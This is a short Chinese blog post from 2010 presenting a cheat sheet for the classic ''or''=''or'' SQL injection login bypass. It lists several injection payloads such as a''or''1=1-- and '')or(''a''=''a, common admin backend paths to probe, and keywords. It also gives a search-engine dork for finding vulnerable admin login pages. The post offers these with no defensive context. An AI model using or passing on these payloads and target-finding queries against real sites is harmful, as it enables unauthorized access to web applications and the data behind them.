小默

'or'='or'经典漏洞攻击

/**
 *常见模式
**/
'or'='or'
a'or'1=1--
'or 1=1--
"or 1=1--
or 1=1--
'or'a'='a
"or"a'='a
"or"a'='a
')or('a'='a

/**
 *后台文件常见文件名
**/
admin
ad_login
ad_manage
addmember
adduser
adm_login
admin/admin
admin/admin_login
admin/index
admin/manage
adimin_admin
admin_edit
admin_index
admin_Login
login/...
...

/**
 *关键字
**/
密码、用户名、后台账号、会员、会员ID、username、password。。。

/**
 *例子
**/
intext:用户名 inurl:admin/login.asp

posted on 2010-05-15 07:52 小默 阅读(650) 评论(1)  编辑 收藏 引用 所属分类: Security

评论

# re: 'or'='or'经典漏洞攻击 2012-04-06 16:42 g

a  回复  更多评论   


只有注册用户登录后才能发表评论。
网站导航: 博客园   IT新闻   BlogJava   博问   Chat2DB   管理


导航

统计

留言簿(13)

随笔分类(287)

随笔档案(289)

漏洞

搜索

积分与排名

最新评论

阅读排行榜